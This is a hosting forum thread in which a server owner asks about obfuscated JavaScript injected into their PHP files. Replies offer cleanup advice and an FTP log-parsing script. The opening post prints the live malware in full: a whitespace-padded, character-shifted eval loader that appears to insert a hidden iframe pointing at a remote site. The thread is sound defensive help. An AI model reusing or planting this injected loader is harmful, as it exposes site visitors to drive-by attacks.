Strange Code - Not Added By Me

[dlwaldow]

I think I have some bug on my VPS (I have root access). In my index.php (and give it time it'll spread to my header and footer.php too) I find this code;

<?
#3b3cf8#
                                                                                                                                                                                                                                                                                                                                                                                                                echo "                                                                                                                                                                                                                                                                                                                                                                                                                <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                asq=function(){return n[i];};ww=window;ss=String[\"fro\"+\"mC\"+\"harC\"+\"o\"+\"de\"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n=\"0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x75,0x7a,0x66,0x68,0x62,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x78,0x78,0x78,0x2f,0x71,0x73,0x6a,0x77,0x62,0x75,0x66,0x74,0x76,0x71,0x66,0x73,0x64,0x62,0x73,0x74,0x2f,0x64,0x70,0x6e,0x30,0x78,0x71,0x6a,0x6e,0x62,0x68,0x66,0x74,0x30,0x73,0x66,0x6d,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x75,0x7a,0x66,0x68,0x62,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x75,0x7a,0x66,0x68,0x62,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c\".split(\",\");h=2;s=\"\";if(whwej){for(i=0;i-510!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;ww[\"eval\"](\"\"+s);}}}}</script>";

#/3b3cf8#
?>

Does anyone know what this is and/or how to get rid of it? :/ I've had to completely reformat my server once before, but now I have a couple of clients on it and I don't want to blow their work out. It's been two to three weeks since the server reformat and this thing is back. I don't understand it. I'm not running joomla at all. These are simple php files that I've created without the help of any other software. The only other things I'm running are Piwigo gallery, fanupdate 3, phpbb (latest), and TheHostingTool. This thing was on the server (before the rebuild) and at the time phpbb and thehostingtool weren't installed. :/

 

[quietFinn]

You got hacked.

 

[hostrazor]

Install rootkit / clamav and maldetect onto your server as root and then scan for malware

 

[dlwaldow]

ClamAV and Maldetect found absolutely nothing at all. As far as rootkit, I have no idea where I can grab one for the server and install via ssh :/

 

[quietFinn]

I have seen that a few times and every time it was uploaded using FTP, i.e. the hacker had got access to the customer's PC and got the cPanel/FTP username & password.

Check FTP access logs in /var/log/messages

 

[dlwaldow]

I have seen that a few times and every time it was uploaded using FTP, i.e. the hacker had got access to the customer's PC and got the cPanel/FTP username & password.

Check FTP access logs in /var/log/messages

Ftp access logs from a ? at the local ip. Do you know how to prevent this by chance?

 

[quietFinn]

In /var/log/messages you see if someone has connected to that account using FTP, and in that case you see the IP address they connect from. Blocking that IP does not really help, but if you see that FTP has been used to upload those changed files then you know the way they have used.

The password of that account must be changed of course, and the owner of that account (or anyone who had the password) must scan their PC very well.

 

[dlwaldow]

I rebuilt my computer completely to get rid of the Trojan that was on it. I went back into cpanel to clean the files and am finding this instead. Is it the same thing?

<!--3b3cf8--><img src="http://localhost/" ><!--/3b3cf8-->

<?
#3b3cf8#
echo('<img src=\"http://localhost/\" >');
#/3b3cf8#
?>

Should I be going through SSH and finding all instances of this code?

 

[mattsh]

I'm also getting this on 2 sites on the same hosting. My personal site (hosted elsewhere) does not have this problem.

Aside from scans, does anyone have any specific ideas on how to fix this?

 

[cPanelMichael]

I'm also getting this on 2 sites on the same hosting. My personal site (hosted elsewhere) does not have this problem. Aside from scans, does anyone have any specific ideas on how to fix this?

I recommend consulting with a qualified system administrator to investigate your system to determine how it was exploited. Note that if your server was rooted, reinstalling the OS/cPanel and restoring the accounts is typically the best way to ensure the server is cleaned.

Thank you.

 

[quizknows]

I've seen this hack a ton of times. 99.99% of the time the server is not rooted: either your FTP password was used to upload the modified files, or your CMS had a weak admin password or old plugin used to modify the files.

If you're lucky and you disabled cPanel's default 24 hour deletion of access logs for Apache, you can use the time stamps from the files to consult your apache domlogs to see if there is a malicious PHP script used around that time.

You will ultimately need to remove the bad code or restore the infected files from a clean backup. At that time make sure you disable domlog deletion in WHM, or enable Raw Access Log archiving in cPanel for the domain; this way if it gets "hacked" again you can track it down.

 

[Aaron.Edwards]

Ftp access logs from a ? at the local ip. Do you know how to prevent this by chance?

Try with the small shell script to check if some one tried to hack the user ftp account from the same ip address ?

#!/bin/sh
        awk '/pure-ftpd: \([^\?].*/ { print $6 }' /var/log/messages* |
        sed 's/^(\(.*\))/\1/' |
        awk -F@ '{ if ($2) print $2 " " $1 }'  |
        sort | uniq |
        awk '{print $1}' |
        uniq -c |
        awk '{if ($1 > 2) print $2}' |
        while read ipaddr; do
                echo ${ipaddr}:
                awk '/pure-ftpd: \([^?].*@'${ipaddr}'\)/' /var/log/messages* |
                sed 's/^.*(\([a-z0-9A-Z_][[a-z0-9A-Z_]*\)@.*/\1/' |
                sort | uniq
        done